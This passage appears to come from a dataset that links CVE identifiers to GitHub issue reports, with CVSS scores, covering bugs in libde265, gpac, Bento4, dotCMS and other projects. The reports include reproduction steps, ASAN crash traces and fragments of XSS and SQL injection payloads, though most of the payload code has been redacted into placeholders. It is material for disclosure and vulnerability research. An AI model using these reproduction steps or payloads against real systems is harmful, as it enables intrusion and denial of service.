        "description": "SIGSEV with sync_repl. Issue Description When running a sync_repl client, it crashes current master APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG b NUMBERTAG abb (pc NUMBERTAG f2c NUMBERTAG c6c NUMBERTAG d bp NUMBERTAG f2be7fc3d NUMBERTAG sp NUMBERTAG f2be7fc3d NUMBERTAG T NUMBERTAG APITAG signal is caused by a READ memory access NUMBERTAG f2c NUMBERTAG c6c NUMBERTAG c in slapi_value_get_string PATHTAG NUMBERTAG f2c NUMBERTAG in sync_create_state_control PATHTAG NUMBERTAG f2c NUMBERTAG a NUMBERTAG f in sync_srch_refresh_pre_entry PATHTAG NUMBERTAG f2c NUMBERTAG bb NUMBERTAG in plugin_call_func PATHTAG NUMBERTAG f2c NUMBERTAG bb6fb6 in plugin_call_list PATHTAG NUMBERTAG f2c NUMBERTAG baf NUMBERTAG c in plugin_call_plugins PATHTAG NUMBERTAG f2c NUMBERTAG bf9a6a in send_ldap_search_entry_ext PATHTAG NUMBERTAG f2c NUMBERTAG bf NUMBERTAG e6 in send_ldap_search_entry PATHTAG NUMBERTAG f2c NUMBERTAG b NUMBERTAG in send_entry PATHTAG NUMBERTAG f2c NUMBERTAG b NUMBERTAG in iterate PATHTAG NUMBERTAG f2c NUMBERTAG b NUMBERTAG b in send_results_ext PATHTAG NUMBERTAG f2c NUMBERTAG b7fffe in op_shared_search PATHTAG NUMBERTAG b1 in do_search PATHTAG NUMBERTAG c7 in connection_dispatch_operation PATHTAG NUMBERTAG a5f5 in connection_threadmain PATHTAG NUMBERTAG f2c NUMBERTAG b NUMBERTAG APITAG NUMBERTAG f2c NUMBERTAG de4e1 in start_thread APITAG NUMBERTAG f2c NUMBERTAG a2 in clone APITAG APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in slapi_value_get_string Thread T NUMBERTAG created by T0 here NUMBERTAG f2c NUMBERTAG de NUMBERTAG in pthread_create APITAG NUMBERTAG f2c NUMBERTAG a APITAG APITAG Package Version and Platform: Platform: fedora Steps to Reproduce Steps to reproduce the behavior NUMBERTAG run sync_repl suite NUMBERTAG start standalone NUMBERTAG launch: ldapsearch ... E sync=rp b 'cn=config' APITAG Expected results Should not crash",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-35196",
        "Issue_Url_old": "https://github.com/olivierkes/manuskript/issues/891",
        "Issue_Url_new": "https://github.com/olivierkes/manuskript/issues/891",
        "Repo_new": "olivierkes/manuskript",
        "Issue_Created_At": "2021-06-17T17:52:17Z",
        "description": "Possible security issue. Hi, do you have a process for reporting a possible security issue with Manuskript?",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-35265",
        "Issue_Url_old": "https://github.com/maxsite/cms/issues/414",
        "Issue_Url_new": "https://github.com/maxsite/cms/issues/414",
        "Repo_new": "maxsite/cms",
        "Issue_Created_At": "2020-10-21T08:15:04Z",
        "description": "Cross Site Scripting Vulnerability on URLTAG Although CMS has protection means But after testing, the protection is not comprehensive enough.. like this URLTAG url FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-35283",
        "Issue_Url_old": "https://github.com/atoms183/CMS/issues/1",
        "Issue_Url_new": "https://github.com/atoms183/cms/issues/1",
        "Repo_new": "atoms183/cms",
        "Issue_Created_At": "2021-06-09T05:44:41Z",
        "description": "product_ FILETAG SQL injection. product_ FILETAG There is SQL injection in line NUMBERTAG CODETAG Just submit the following post request APITAG FILETAG post : query=a",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-35306",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/615",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/615",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2021-06-10T13:16:05Z",
        "description": "SEGV in mp NUMBERTAG aac. Hello, A SEGV has occurred when running program mp NUMBERTAG aac\uff0c System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Bento4 version NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of Bento4 APITAG APITAG NUMBERTAG run mp NUMBERTAG aac APITAG Output APITAG APITAG output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-35307",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/616",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/616",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2021-06-10T14:10:25Z",
        "description": "SEGV in mp NUMBERTAG aac. Hello, A SEGV has occurred when running program mp NUMBERTAG aac\uff0c System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Bento4 version NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of Bento4 APITAG APITAG NUMBERTAG run mp NUMBERTAG aac APITAG Output APITAG APITAG output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-35323",
        "Issue_Url_old": "https://github.com/bludit/bludit/issues/1327",
        "Issue_Url_new": "https://github.com/bludit/bludit/issues/1327",
        "Repo_new": "bludit/bludit",
        "Issue_Created_At": "2021-05-27T17:35:01Z",
        "description": "cross site script (xss) . Describe your problem I found a cross site scripting attack on the login page URLTAG cross site scripting is a vulnerability that allows an attacker to send malicious code(usually in javascript form) to another user Because a browser cannot know if the script should be trusted or not, it will execute the script in user context allowing the attacker to access any cookies or sessions tokens retained by the browser. Steps to reproduce the problem NUMBERTAG open login page URLTAG NUMBERTAG enter the username place admin\"> APITAG and enter password NUMBERTAG trigger the malicious javascript code Bludit version bludit NUMBERTAG PHP version PHP NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-35344",
        "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/432",
        "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/432",
        "Repo_new": "justdan96/tsmuxer",
        "Issue_Created_At": "2021-05-27T22:03:26Z",
        "description": "heap buffer overflow in APITAG Hi, please see asan output and poc file below. Found by Cem Onat Karagun of Diesec As you can see on backtrace APITAG System info\uff1a APITAG To run APITAG after unzip: FILETAG APITAG Asan output: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-35346",
        "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/436",
        "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/436",
        "Repo_new": "justdan96/tsmuxer",
        "Issue_Created_At": "2021-05-27T22:06:00Z",
        "description": "heap buffer overflow in APITAG Hi, please see asan output and poc file below. Found by Cem Onat Karagun of Diesec As you can see on backtrace APITAG System info\uff1a APITAG To run APITAG after unzip: FILETAG APITAG Asan output: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-35358",
        "Issue_Url_old": "https://github.com/dotCMS/core/issues/20540",
        "Issue_Url_new": "https://github.com/dotcms/core/issues/20540",
        "Repo_new": "dotcms/core",
        "Issue_Created_At": "2021-06-15T01:52:32Z",
        "description": "Store XSS in APITAG APITAG on APITAG Describe the bug Hi Team I found small a store xss in APITAG APITAG install: Docker: APITAG To Reproduce NUMBERTAG Login Admin panel NUMBERTAG Go to APITAG APITAG NUMBERTAG Click on APITAG new content NUMBERTAG Parameter: APITAG and APITAG NUMBERTAG Insert Payload Store XSS: \" APITAG foo / bar NUMBERTAG Click APITAG File' and BOOM XSS NUMBERTAG Save and refersh store XSS impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG Desktop (please complete the following information): OS: Win NUMBERTAG Browser Chrome: Version NUMBERTAG APITAG Build NUMBERTAG bit)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-35360",
        "Issue_Url_old": "https://github.com/dotCMS/core/issues/20541",
        "Issue_Url_new": "https://github.com/dotcms/core/issues/20541",
        "Repo_new": "dotcms/core",
        "Issue_Created_At": "2021-06-15T04:00:37Z",
        "description": "Reflected XSS Vulnerability on Docker: APITAG Describe the bug Hi Team I found small reflected xss APITAG install: Docker: APITAG To Reproduce NUMBERTAG Login Admin panel NUMBERTAG uln link1: APITAG /c/containers NUMBERTAG uln link2: APITAG /c/links NUMBERTAG insert payload: \"> APITAG NUMBERTAG para: 'SEARCH NUMBERTAG Boom XSS impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots xss link1: FILETAG xss link2: FILETAG Desktop (please complete the following information): OS: Win NUMBERTAG Browser Chrome: Version NUMBERTAG APITAG Build NUMBERTAG bit)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-35438",
        "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/3351",
        "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/3351",
        "Repo_new": "phpipam/phpipam",
        "Issue_Created_At": "2021-06-18T07:44:36Z",
        "description": "XSS (reflected) in IP calculator. verison NUMBERTAG FILETAG PATHTAG / APITAG alert(/xss/) APITAG Input the POC to IP calculator box and Get an alert box",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-35452",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/298",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/298",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2021-06-22T14:49:43Z",
        "description": "SEGV in slice.cc. Hello, A SEGV has occurred when running program dec NUMBERTAG System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Dec NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of libde NUMBERTAG APITAG APITAG NUMBERTAG run dec NUMBERTAG without asan) APITAG Output ERRORTAG APITAG output ERRORTAG This issue will cause Denial of Service attacks",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-35513",
        "Issue_Url_old": "https://github.com/mermaid-js/mermaid/issues/2122",
        "Issue_Url_new": "https://github.com/mermaid-js/mermaid/issues/2122",
        "Repo_new": "mermaid-js/mermaid",
        "Issue_Created_At": "2021-06-08T17:31:30Z",
        "description": "Antiscript option should remove javascript urls . Antiscript option should remove javascript urls",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-3575",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1347",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1347",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2021-04-30T00:10:00Z",
        "description": "Heap buffer overflow in APITAG in sycc NUMBERTAG to_rgb. Hi, I found a vulnerability in current master NUMBERTAG bda NUMBERTAG URLTAG , and I also reproduced it on latest released version FILETAG . Crash Summary A heap buffer overflow in APITAG in sycc NUMBERTAG to_rgb, it can lead to heap based buffer overflow via a crafted APITAG file when decompress it. Crash Analysis There is improper check of APITAG . URLTAG APITAG FILETAG To reproduce NUMBERTAG Ubuntu NUMBERTAG with clang NUMBERTAG CODETAG ASAN report: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-3588",
        "Issue_Url_old": "https://github.com/bluez/bluez/issues/70",
        "Issue_Url_new": "https://github.com/bluez/bluez/issues/70",
        "Repo_new": "bluez/bluez",
        "Issue_Created_At": "2021-01-04T06:12:01Z",
        "description": "Potential buffer out of bound read in gatt APITAG URLTAG ERRORTAG Both len and APITAG are unsigned and offset is an external input without validation. It seems like a malicious GATT client can cause out of bound read on memory locations after the given device_state::cli_feat pointer. Similar validation like below should be sufficient: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.3,
        "impactScore": 1.4,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-3596",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/2624",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/2624",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2020-09-25T05:56:46Z",
        "description": "Null Pointer dereference caused by incomplete check of the return value from libxml2 in APITAG APITAG Prerequisites Y ] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported. Description APITAG There is a segmentation fault caused by the NPD in function APITAG APITAG in APITAG NUMBERTAG APITAG does not check the nullity of the pointer returned from libxml2 and dereference it directly. This directly leads to program crashes and segmentation fault. Steps to Reproduce APITAG NUMBERTAG To ensure reproduce, I use a low level privilege user to use up space in the /tmp folder first NUMBERTAG Run: ~~~~ magick convert poc ./test.ps ~~~~ FILETAG (unzip first) Here is the trace reported by ASAN: ~~~~ ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG fec8c bp NUMBERTAG f NUMBERTAG sp NUMBERTAG ffd NUMBERTAG e NUMBERTAG c0 T NUMBERTAG fec8b in APITAG PATHTAG NUMBERTAG c8ba0c in APITAG PATHTAG NUMBERTAG dfbc1 in APITAG PATHTAG NUMBERTAG c8ba0c in APITAG PATHTAG NUMBERTAG c8ecbc in APITAG PATHTAG NUMBERTAG bfaef in APITAG PATHTAG NUMBERTAG fd NUMBERTAG in APITAG PATHTAG NUMBERTAG d in APITAG PATHTAG NUMBERTAG efd NUMBERTAG fa NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG APITAG NUMBERTAG ABORTING ~~~~ System Configuration APITAG ~~~~ PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG fopenmp Wall O0 g fsanitize=address mtune=broadwell fexceptions pthread DMAGICKCORE_HDRI_ENABLE NUMBERTAG DMAGICKCORE_QUANTUM_DEPTH NUMBERTAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jp2 jpeg lzma png x xml zlib Environment APITAG system, version and so on): APITAG DISTRIB_RELEASE NUMBERTAG DISTRIB_CODENAME=xenial APITAG NUMBERTAG LTS\" Additional information: APITAG Here is the link toward function APITAG URLTAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-35970",
        "Issue_Url_old": "https://github.com/coralproject/talk/issues/3600",
        "Issue_Url_new": "https://github.com/coralproject/talk/issues/3600",
        "Repo_new": "coralproject/talk",
        "Issue_Created_At": "2021-06-28T08:37:55Z",
        "description": "Severe Security Issue in Version NUMBERTAG E Mail Leak. I already contacted some maintainers privately about this, but they did not respond. That's why I'm now making this public. In Talk version NUMBERTAG it is very easy to query the e mail addresses of users without any authentication; thus, possibly revealing their true identities behind their pseudonyms. This is possible although the documentation states: > The primary email address of the user. Only accessible to Administrators or the current user. But in order to find out the e mail address of a user, you can e.g. simply send a APITAG APITAG query to the APITAG endpoint of the talk server \u00ad without any authentication. You can also query all e mail addresses with APITAG . I demand the maintainers ( MENTIONTAG , MENTIONTAG APITAG to merge the pull request URLTAG as soon as possible, and release version NUMBERTAG in the version NUMBERTAG branch.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-3628",
        "Issue_Url_old": "https://github.com/openkm/document-management-system/issues/278",
        "Issue_Url_new": "https://github.com/openkm/document-management-system/issues/278",
        "Repo_new": "openkm/document-management-system",
        "Issue_Created_At": "2021-04-08T07:59:31Z",
        "description": "Cross Site Scrtipting issue.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-36383",
        "Issue_Url_old": "https://github.com/vatesfr/xen-orchestra/issues/5712",
        "Issue_Url_new": "https://github.com/vatesfr/xen-orchestra/issues/5712",
        "Repo_new": "vatesfr/xen-orchestra",
        "Issue_Created_At": "2021-04-05T22:34:39Z",
        "description": "XEN Orchestra privilege escalation via websockets. Context XO origin : XO Appliance Versions : Node NUMBERTAG o web NUMBERTAG o server NUMBERTAG Expected behavior Permissions enforcement through websockets is not thoroughly checked and can lead to an unprivileged 'user' to obtain data only accessible by 'admin'. VMs, Backups, Audit, Users, Groups, etc. Current behavior The websockets that control the application API are allowing access to certain elements based purely on the response (which can be manipulated). This would be similar to an ecommerce application taking the price of a shopping cart from the DOM (can be manipulated by the user) and starting the checkout process using this value). In this POC, the method APITAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-36408",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/299",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/299",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2021-06-23T03:45:54Z",
        "description": "Heap use after free in intrapred.h when decoding file. Hello, A Heap use after free has occurred when running program dec NUMBERTAG System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Dec NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of libde NUMBERTAG APITAG APITAG NUMBERTAG run dec NUMBERTAG APITAG asan info ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-36409",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/300",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/300",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2021-06-24T13:41:11Z",
        "description": "There is an Assertion failed at sps.cc. Hello, There is an Assertion APITAG failed at APITAG in libde NUMBERTAG when decoding file. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Dec NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of libde NUMBERTAG APITAG APITAG NUMBERTAG run dec NUMBERTAG APITAG Output ERRORTAG gdb info ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-36410",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/301",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/301",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2021-06-24T14:47:49Z",
        "description": "stack buffer overflow in fallback motion.cc when decoding file. Hello, A stack buffer overflow has occurred when running program dec NUMBERTAG System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Dec NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of libde NUMBERTAG APITAG APITAG NUMBERTAG run dec NUMBERTAG APITAG asan info ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-36411",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/302",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/302",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2021-06-25T14:41:05Z",
        "description": "A SEGV has occurred when running program dec NUMBERTAG Hello, A SEGV of deblock.cc in function APITAG has occurred when running program dec NUMBERTAG source code CODETAG Due to incorrect access control, a SEGV caused by a READ memory access occurred at line NUMBERTAG of the code. This issue can cause a Denial of Service attack. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Dec NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of libde NUMBERTAG APITAG APITAG NUMBERTAG run dec NUMBERTAG without asan) APITAG Output ERRORTAG APITAG output ERRORTAG gdb info ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-36412",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1838",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1838",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-07-03T03:57:55Z",
        "description": "A heap buffer overflow in function APITAG Hello, A heap buffer overflow has occurred when running program APITAG can reproduce on the lattest commit. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of gpac APITAG APITAG NUMBERTAG run APITAG APITAG asan info ERRORTAG source code of rtp_pck_mpeg NUMBERTAG c CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-36414",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1840",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1840",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-07-05T12:32:43Z",
        "description": "heap buffer overflow issue with gpac APITAG Hello, A heap buffer overflow has occurred when running program APITAG leads to a Deny of Service caused by dividing zero without sanity check,this can reproduce on the lattest commit. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG FILETAG file: media.c APITAG line NUMBERTAG As below code shows: CODETAG Verification steps\uff1a APITAG the source code of gpac APITAG APITAG NUMBERTAG run APITAG APITAG In Command line: ERRORTAG gdb info FILETAG asan info ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-36417",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1846",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1846",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-07-07T03:09:17Z",
        "description": "A heap buffer overflow has occurred in function gf_isom_dovi_config_get. Hello, A heap buffer overflow has occurred in function gf_isom_dovi_config_get of APITAG when running program APITAG can reproduce on the lattest commit. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of gpac APITAG APITAG NUMBERTAG run APITAG APITAG command line ERRORTAG asan info ERRORTAG source code CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-36440",
        "Issue_Url_old": "https://github.com/star7th/showdoc/issues/1406",
        "Issue_Url_new": "https://github.com/star7th/showdoc/issues/1406",
        "Repo_new": "star7th/showdoc",
        "Issue_Created_At": "2021-06-24T06:45:37Z",
        "description": "File Upload vulnerability. A File Upload vulnerability was discovered in APITAG NUMBERTAG description The file_url parameter allows remote download of compressed files, and the files in the compressed package will be released to the web directory when decompressed Vulnerability file: PATHTAG ERRORTAG APITAG CODETAG zip File FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-36454",
        "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/24",
        "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/24",
        "Repo_new": "navigatecms/navigate-cms",
        "Issue_Created_At": "2021-06-22T08:59:25Z",
        "description": "Reflected XSS attack with navigate quickse parameter and affect many modules in APITAG NUMBERTAG EXPECTED BEHAVIOUR An authenticated malicious user can take advantage of a Reflected XSS vulnerability with navigate quickse parameter in URL and affect many modules. IMPACT Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. VULNERABILITY CODE I found the vulnerability code in many files. Because initial_url is built in these files. > PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG FILETAG After that initial_url is used in PATHTAG file to build HTML. FILETAG STEPS TO REPRODUCE NUMBERTAG We change the request and send the link to user CODETAG FILETAG NUMBERTAG People who already login and click to the link above NUMBERTAG When loading the page then the Reflected XSS is executed. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-36455",
        "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/25",
        "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/25",
        "Repo_new": "navigatecms/navigate-cms",
        "Issue_Created_At": "2021-06-26T09:25:58Z",
